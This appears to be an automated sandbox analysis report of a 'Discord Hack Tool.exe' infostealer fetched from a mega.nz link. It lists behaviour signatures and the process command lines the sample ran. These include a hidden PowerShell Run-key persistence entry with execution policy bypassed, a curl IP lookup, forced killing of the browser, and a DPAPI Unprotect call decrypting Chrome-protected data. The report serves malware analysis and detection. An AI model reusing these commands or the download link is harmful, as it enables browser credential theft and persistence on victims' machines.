Analysis Overview
Threat Level: Likely malicious
The file https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Clipboard Data
Hide Artifacts: Hidden Window
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates processes with tasklist
Subvert Trust Controls: Mark-of-the-Web Bypass
Browser Information Discovery
Enumerates physical storage devices
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies registry key
NTFS ADS
Enumerates system info in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Detects videocard installed
Kills process with taskkill
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-02 10:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-02 10:16
Reported
2024-11-02 10:17
Platform
win11-20241007-en
Max time kernel
58s
Max time network
66s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Discord Hack Tool.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Discord Hack Tool.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\kNPBRiEUjxJrLAI.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\Downloads\\Discord Hack Tool.exe" | C:\Windows\system32\reg.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 111331.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffac1093cb8,0x7ffac1093cc8,0x7ffac1093cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1828 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6196 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
C:\Users\Admin\Downloads\Discord Hack Tool.exe
"C:\Users\Admin\Downloads\Discord Hack Tool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5743.tmp" "c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM msedge.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
